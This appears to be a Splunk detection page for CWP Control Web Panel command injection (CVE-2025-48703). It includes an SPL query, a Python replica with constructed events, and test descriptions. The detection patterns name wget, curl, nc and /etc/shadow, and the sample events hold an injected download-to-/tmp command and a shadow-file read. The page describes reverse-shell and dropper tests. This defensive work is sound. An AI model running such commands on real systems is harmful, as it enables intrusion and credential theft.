Detect CVE-2025-48703 - CWP Control Web Panel OS Command Injection in Splunk
Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.
MITRE ATT&CK
SPL Detection Query
(index=os OR index=web) (sourcetype=linux_audit OR sourcetype=syslog OR sourcetype=access_combined)
| eval is_cwp_parent=if(match(parent_process, "httpd|apache2|nginx|cwpsrv|php-fpm|php"), 1, 0)
| eval is_suspicious_cmd=if(match(cmd, "\b(id|whoami|uname|passwd|shadow|chmod|wget|curl|nc|ncat|socat|base64)\b|/tmp/|/dev/shm"), 1, 0)
| eval is_cwp_path=if(match(_raw, "/usr/local/cwpsrv/|/opt/cwp/|cwp_api"), 1, 0)
| where is_suspicious_cmd=1 AND (is_cwp_parent=1 OR is_cwp_path=1)
| eval risk=case(
    match(cmd, "shadow|/dev/shm|base64|chmod 777"), "critical",
    match(cmd, "\b(wget|curl|nc|ncat)\b"), "high",
    true(), "medium")
| eval risk_score=case(risk="critical", 3, risk="high", 2, true(), 1)
| stats count, values(cmd) as commands, values(src_ip) as source_ips, earliest(_time) as first_seen, latest(_time) as last_seen by host, user, parent_process, risk, risk_score
| sort -risk_score, -count
Detects OS command injection exploitation in CWP Control Web Panel by identifying suspicious processes spawned from CWP web service parents. Aggregates by host and user to surface repeated injection attempts. The index and sourcetype filters are parenthesised because AND binds tighter than OR in Splunk search syntax; the command patterns use word boundaries so that short tokens such as "id" and "nc" do not match inside unrelated binary names; and sorting uses a numeric risk_score rather than the tier name, since an alphabetical sort on the name would rank "medium" above "critical".
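The query's classification and aggregation stages, reproduced in Python over constructed process-creation events so the logic can be exercised offline. This is an added example, not part of the original detection content; the key=value event format, host name, addresses and the helper names parse_event, classify and detect are assumptions, while the field names (host, user, parent_process, cmd) are the ones the query expects.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not real telemetry), laid out with the
# fields the SPL query expects after extraction from linux_audit or syslog.
SAMPLE_EVENTS = """\
host=cwp01 user=www-data parent_process=cwpsrv cmd="id"
host=cwp01 user=www-data parent_process=cwpsrv cmd="wget http://203.0.113.9/x -O /tmp/x"
host=cwp01 user=www-data parent_process=php-fpm cmd="cat /etc/shadow"
host=cwp01 user=www-data parent_process=cwpsrv cmd="/usr/bin/identify -version"
host=cwp01 user=root parent_process=sshd cmd="wget https://mirror.example/pkg.tgz"
"""

CWP_PARENT = re.compile(r"^(httpd|apache2|nginx|cwpsrv|php-fpm|php)$")
CWP_PATH = re.compile(r"/usr/local/cwpsrv/|/opt/cwp/|cwp_api")
# \b stops short tokens such as "id" or "nc" matching inside unrelated names ("identify", "rsync").
SUSPICIOUS = re.compile(r"\b(id|whoami|uname|passwd|shadow|chmod|wget|curl|nc|ncat|socat|base64)\b|/tmp/|/dev/shm")
CRITICAL = re.compile(r"shadow|/dev/shm|base64|chmod 777")
HIGH = re.compile(r"\b(wget|curl|nc|ncat)\b")
RISK_ORDER = {"critical": 3, "high": 2, "medium": 1}
KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Split a key=value line into a dict; double-quoted values may contain spaces."""
    return {k: (q if raw.startswith('"') else raw) for k, raw, q in KV.findall(line)}

def classify(ev, raw_line):
    """Risk tier for one event, or None where the query's where-clause would drop it."""
    cmd = ev.get("cmd", "")
    from_cwp = CWP_PARENT.search(ev.get("parent_process", "")) or CWP_PATH.search(raw_line)
    if not (from_cwp and SUSPICIOUS.search(cmd)):
        return None
    if CRITICAL.search(cmd):
        return "critical"
    if HIGH.search(cmd):
        return "high"
    return "medium"

def detect(text):
    """Mirror the stats/sort stage: group hits by host, user, parent_process and risk."""
    groups = defaultdict(lambda: {"count": 0, "commands": set()})
    for line in text.splitlines():
        ev = parse_event(line)
        risk = classify(ev, line)
        if risk is None:
            continue
        g = groups[(ev["host"], ev["user"], ev["parent_process"], risk)]
        g["count"] += 1
        g["commands"].add(ev["cmd"])
    # Order by severity then volume; sorting on the tier name alphabetically would put "medium" first.
    return sorted(groups.items(), key=lambda kv: (-RISK_ORDER[kv[0][3]], -kv[1]["count"]))
```

Running detect(SAMPLE_EVENTS) yields three groups ordered critical, high, medium; the identify invocation and the sshd-spawned wget produce no alert.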
Data Sources
Required Sourcetypes
False Positives & Tuning
- Legitimate administrative shell commands issued through CWP terminal features
- Automated backup or maintenance scripts running under the web server user
- Penetration testing activity against the CWP host with prior authorization
- CWP plugin or module execution that spawns helper processes
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: CWP Command Injection via API Parameter
  Expected signal: Linux audit log EXECVE event showing 'id' executed by the web server user (www-data/apache/cwp); web access log entry with URL-encoded semicolon in query parameter
- Test 2: Reverse Shell Establishment Post-CWP Exploitation
  Expected signal: Process creation event for bash spawned by www-data user with -i flag and /dev/tcp redirect; outbound TCP connection to attacker IP on port 4444 from the CWP host
- Test 3: Credential Harvesting via /etc/shadow Access
  Expected signal: Audit log showing www-data user attempting to read /etc/shadow; base64 encoding command in process arguments; file access event on /etc/shadow
- Test 4: Dropper Download via Injected wget Command
  Expected signal: wget process spawned by www-data with external URL argument; outbound HTTP GET to attacker-controlled server; file creation event in /tmp by web service user; chmod execution on downloaded file